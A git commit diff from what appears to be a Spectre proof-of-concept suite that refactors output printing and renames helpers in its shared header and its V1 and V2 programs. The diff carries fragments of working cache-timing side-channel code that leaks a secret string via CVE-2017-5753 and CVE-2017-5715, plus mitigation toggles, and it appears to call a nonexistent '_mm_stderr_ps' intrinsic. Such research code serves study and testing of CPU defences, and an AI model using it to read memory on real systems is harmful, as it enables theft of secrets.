Factorize outputs

2022-04-12 13:46:35 +02:00 · 2022-04-12 13:46:35 +02:00 · 6c32500747
commit 6c32500747
parent a8612b146a
3 changed files with 123 additions and 136 deletions
--- a/octopus.h
+++ b/octopus.h
@ -26,50 +26,55 @@
 	#endif
 #endif

-#ifdef MASKING_MITIGATION
-	/* From https://github.com/torvalds/linux/blob/cb6416592bc2a8b731dabcec0d63cda270764fc6/arch/x86/include/asm/barrier.h#L27 
-	 *
-	 * array_index_mask_nospec() - generate a mask that is ~0UL when the
-	 * 	bounds check succeeds and 0 otherwise
-	 * @index: array element index
-	 * @size: number of elements in array
-	 *
-	 * Returns:
-	 *     0 - (index < size)
-	 */
-	static inline unsigned long
-	array_index_mask_nospec(unsigned long index, unsigned long size)
-	{
-		unsigned long mask;
-		__asm__ __volatile__ ("cmp %1,%2; sbb %0,%0;"
-			:"=r" (mask)
-			:"g"(size),"r" (index)
-			:"cc");
-		return mask;
-	}
-#endif //MASKING_MITIGATION
+#if OCTOPUS_STRAIN == V1
+	#ifdef MASKING_MITIGATION
+		/* From https://github.com/torvalds/linux/blob/cb6416592bc2a8b731dabcec0d63cda270764fc6/arch/x86/include/asm/barrier.h#L27 
+		 *
+		 * array_index_mask_nospec() - generate a mask that is ~0UL when the
+		 * 	bounds check succeeds and 0 otherwise
+		 * @index: array element index
+		 * @size: number of elements in array
+		 *
+		 * Returns:
+		 *     0 - (index < size)
+		 */
+		static inline unsigned long
+		octopus_array_index_mask_nospec(unsigned long index, unsigned long size)
+		{
+			unsigned long mask;
+			__asm__ __volatile__ ("cmp %1,%2; sbb %0,%0;"
+				:"=r" (mask)
+				:"g"(size),"r" (index)
+				:"cc");
+			return mask;
+		}
+	#endif //MASKING_MITIGATION
+	
+	#ifdef NOCLFLUSH
+		#define CACHE_FLUSH_ITERATIONS 	2048
+		#define CACHE_FLUSH_STRIDE 	4096
+	
+		uint8_t 	cache_flush_array[CACHE_FLUSH_STRIDE * CACHE_FLUSH_ITERATIONS];
+	
+		/* Flush memory using long SSE instructions */
+		void 
+		octopus_flush_memory_sse(uint8_t * addr)
+		{
+			float*	p = (float *)addr;
+			float 	c = 0.f;
+			__m128 i = _mm_setr_ps(c, c, c, c);
+	
+			int k, l;
+			/* Non-sequential memory addressing by looping through k by l */
+			for (k = 0; k < 4; k++)
+				for (l = 0; l < 4; l++)
+					_mm_stderr_ps(&p[(l * 4 + k) * 4], i);
+		}
+	#endif //NOCLFLUSH
+#endif // OCTOPUS_STRAIN V1

-#ifdef NOCLFLUSH
-	#define CACHE_FLUSH_ITERATIONS 	2048
-	#define CACHE_FLUSH_STRIDE 	4096
-
-	uint8_t 	cache_flush_array[CACHE_FLUSH_STRIDE * CACHE_FLUSH_ITERATIONS];
-
-	/* Flush memory using long SSE instructions */
-	void 
-	flush_memory_sse(uint8_t * addr)
-	{
-		float*	p = (float *)addr;
-		float 	c = 0.f;
-		__m128 i = _mm_setr_ps(c, c, c, c);
-
-		int k, l;
-		/* Non-sequential memory addressing by looping through k by l */
-		for (k = 0; k < 4; k++)
-			for (l = 0; l < 4; l++)
-				_mm_stderr_ps(&p[(l * 4 + k) * 4], i);
-	}
-#endif //NOCLFLUSH
+#if OCTOPUS_STRAIN == V2
+#endif // OCTOPUS_STRAIN V2

 #define GAP 512

@ -105,7 +110,7 @@ uint8_t 	channel[256 * GAP]; // side channel to extract secret phrase
 		for (i = 0; i < 256; i++) {\
 			mix_i = ((i * 167) + 13) & 255;\
 			addr = & channel[mix_i * GAP];\
-			if (timed_access(addr) <= cache_hit_threshold && mix_i != array1[tries % array1_size]) {\
+			if (octopus_timed_access(addr) <= cache_hit_threshold && mix_i != array1[tries % array1_size]) {\
 				results[mix_i]++; /* cache hit - add +1 to score for this value */\
 			}\
 		}\
@ -125,13 +130,9 @@ uint8_t 	channel[256 * GAP]; // side channel to extract secret phrase
 		int l;\
 		(void)junk2;

-#define __OCTOPUS_MFENCE__\
-	#ifndef NOMFENCE\
-		_mm_mfence();\
-	#endif

 static inline unsigned
-timed_access(volatile uint8_t *addr)
+octopus_timed_access(volatile uint8_t *addr)
 {
 	uint64_t	t0, t1;
 	#pragma GCC diagnostic ignored "-Wuninitialized"
@ -172,7 +173,7 @@ timed_access(volatile uint8_t *addr)
 }

 static void
-calibrate_threshold(unsigned int *threshold)
+octopus_calibrate_threshold(unsigned int *threshold)
 {
 	volatile char		buf[2 * CACHELINE_SIZE];
 	volatile uint8_t*	bufp;
@ -187,7 +188,7 @@ calibrate_threshold(unsigned int *threshold)
 	junk |= *bufp;
 	
 	for (i = 0, tcache = 0; i < cnt; i++) {
-		tcache += timed_access(bufp);
+		tcache += octopus_timed_access(bufp);
 	}
 	tcache = tcache / cnt;
 	
@ -197,4 +198,63 @@ calibrate_threshold(unsigned int *threshold)
 	return;
 }

+void
+octopus_to_json(char** argv, int successes) {
+	printf("{ \"%s\": { \"capacities\": { ",argv[0] + 2);
+	#ifndef NORDTSCP
+		printf("\"rdtscp\": true, ");
+	#else
+		printf("\"rdtscp\": false, ");
+	#endif
+ 	#ifndef NOMFENCE
+		printf("\"mfence\": true, ");
+	#else
+		printf("\"mfence\": false, ");
+	#endif
+	#ifndef NOCLFLUSH
+		printf("\"clflush\": true ");
+	#else
+		printf("\"clflush\": false ");
+	#endif 
+	#if OCTOPUS_STRAIN == V1
+			printf("}, \"mitigations\": { ");
+		#ifdef LFENCE_MITIGATION
+			printf("\"lfence\": true, ");
+		#else
+			printf("\"lfence\": false, ");
+		#endif
+		#ifdef MASKING_MITIGATION
+			printf("\"masking\": true ");
+		#else
+			printf("\"masking\": false ");
+		#endif
+	#endif // OCTOPUS_STRAIN == V1
+	printf("}, ");
+	printf("\"threshold\": %d, ", cache_hit_threshold);
+	printf("\"success\": %.0f } }", 100 * successes / (float)strlen(secret));
+}

+void
+octopus_result_line(char** argv, int successes) {
+	fprintf(stderr, "[+] %-27s\t",argv[0] + 2);
+	#ifndef NORDTSCP
+		fprintf(stderr, "RDTSCP ");
+	#else
+		fprintf(stderr, "RDTSC ");
+	#endif
+	 #ifndef NOMFENCE
+		fprintf(stderr, "MFENCE ");
+	#endif
+	#ifndef NOCLFLUSH
+		fprintf(stderr, "CLFLUSH ");
+	#endif 
+	#if OCTOPUS_STRAIN == V1
+		#ifdef LFENCE_MITIGATION
+			fprintf(stderr, "LFENCE_MITIGATION ");
+		#endif
+		#ifdef MASKING_MITIGATION
+			fprintf(stderr, "MASKING_MITIGATION ");
+		#endif
+	#endif // OCTOPUS_STRAIN == V1
+	fprintf(stderr, "\tthreshold %-3d\tsuccess %3.0f %%\n", cache_hit_threshold, 100 * successes / (float)strlen(secret));
+}
--- a/spectre_v1.c
+++ b/spectre_v1.c
@ -19,6 +19,7 @@
 * OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
 */

+#define OCTOPUS_STRAIN V1
 #include "octopus.h"

 uint8_t		temp = 0; /* Used so compiler won’t optimize out victim_function() */
@ -116,7 +117,7 @@ main(int argc, char** argv)
 	__OCTOPUS_ARGS__

 	fprintf(stderr, "[+] %s leaking %d bytes with CVE-2017-5753:\n[?] ", argv[0] + 2, (int)strlen(secret));
-	calibrate_threshold(cache_hit_threshold ? NULL : &cache_hit_threshold);
+	octopus_calibrate_threshold(cache_hit_threshold ? NULL : &cache_hit_threshold);
 	#ifdef NOCLFLUSH
 		for (i = 0; i < (int)sizeof(cache_flush_array); i++) {
 			cache_flush_array[i] = 1;
@ -136,56 +137,9 @@ main(int argc, char** argv)
 	}
 	fprintf(stderr, "\n");
 	if (json) {
-		printf("{ \"%s\": { \"capacities\": { ",argv[0] + 2);
-		#ifndef NORDTSCP
-			printf("\"rdtscp\": true, ");
-		#else
-			printf("\"rdtscp\": false, ");
-		#endif
-	 	#ifndef NOMFENCE
-			printf("\"mfence\": true, ");
-		#else
-			printf("\"mfence\": false, ");
-		#endif
-		#ifndef NOCLFLUSH
-			printf("\"clflush\": true ");
-		#else
-			printf("\"clflush\": false ");
-		#endif
-			printf("}, \"mitigations\": { ");
-		#ifdef LFENCE_MITIGATION
-			printf("\"lfence\": true, ");
-		#else
-			printf("\"lfence\": false, ");
-		#endif
-		#ifdef MASKING_MITIGATION
-			printf("\"masking\": true ");
-		#else
-			printf("\"masking\": false ");
-		#endif
-		printf("}, ");
-		printf("\"threshold\": %d, ", cache_hit_threshold);
-		printf("\"success\": %.0f } }", 100 * successes / (float)strlen(secret));	
+		octopus_to_json(argv, successes);
 	}
-	fprintf(stderr, "[+] %-27s\t",argv[0] + 2);
-	#ifndef NORDTSCP
-		fprintf(stderr, "RDTSCP ");
-	#else
-		fprintf(stderr, "RDTSC ");
-	#endif
-	 #ifndef NOMFENCE
-		fprintf(stderr, "MFENCE ");
-	#endif
-	#ifndef NOCLFLUSH
-		fprintf(stderr, "CLFLUSH ");
-	#endif
-	#ifdef LFENCE_MITIGATION
-		fprintf(stderr, "LFENCE_MITIGATION ");
-	#endif
-	#ifdef MASKING_MITIGATION
-		fprintf(stderr, "MASKING_MITIGATION ");
-	#endif
-	fprintf(stderr, "\tthreshold %-3d\tsuccess %3.0f %%\n", cache_hit_threshold, 100 * successes / (float)strlen(secret));
-
+	octopus_result_line(argv, successes);
+	
 	return 0;
 }
--- a/spectre_v2.c
+++ b/spectre_v2.c
@ -18,6 +18,7 @@
 * OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
 */

+#define OCTOPUS_STRAIN V2
 #include "octopus.h"

 uint64_t*	target; // pointer to indirect call target
@ -150,7 +151,7 @@ main(int argc, char** argv)
 	
 	target = (uint64_t*)malloc(sizeof(uint64_t));
 	fprintf(stderr, "[+] %s leaking %d bytes with CVE-2017-5715:\n[?] ", argv[0] + 2, len);
-	calibrate_threshold(cache_hit_threshold ? NULL : &cache_hit_threshold);
+	octopus_calibrate_threshold(cache_hit_threshold ? NULL : &cache_hit_threshold);
 	#ifdef NOCLFLUSH
 		for (i = 0; i < (int)sizeof(cache_flush_array); i++) {
 			cache_flush_array[i] = 1;
@ -167,39 +168,11 @@ main(int argc, char** argv)
 	}
 	fprintf(stderr, "\n");
 	if (json) {
-		printf("{ \"%s\": { \"capacities\": { ",argv[0] + 2);
-		#ifndef NORDTSCP
-			printf("\"rdtscp\": true, ");
-		#else
-			printf("\"rdtscp\": false, ");
-		#endif
-	 	#ifndef NOMFENCE
-			printf("\"mfence\": true, ");
-		#else
-			printf("\"mfence\": false, ");
-		#endif
-		#ifndef NOCLFLUSH
-			printf("\"clflush\": true ");
-		#else
-			printf("\"clflush\": false ");
-		#endif
-		printf("}, ");
-		printf("\"threshold\": %d, ", cache_hit_threshold);
-		printf("\"success\": %.0f } }", 100 * successes / (float)strlen(secret));
+		octopus_to_json(argv, successes);
 	}
-	fprintf(stderr, "[+] %-27s\t",argv[0] + 2);
-	#ifndef NORDTSCP
-		fprintf(stderr, "RDTSCP ");
-	#else
-		fprintf(stderr, "RDTSC ");
-	#endif
-	#ifndef NOMFENCE
-		fprintf(stderr, "MFENCE ");
-	#endif
-	#ifndef NOCLFLUSH
-		fprintf(stderr, "CLFLUSH ");
-	#endif
-	fprintf(stderr, "\tthreshold %-3d\tsuccess %3.0f %%\n", cache_hit_threshold, 100 * successes / (float)strlen(secret));
-        free(target);
+	octopus_result_line(argv, successes);
+	
+	free(target);
+	
 	return 0;
 }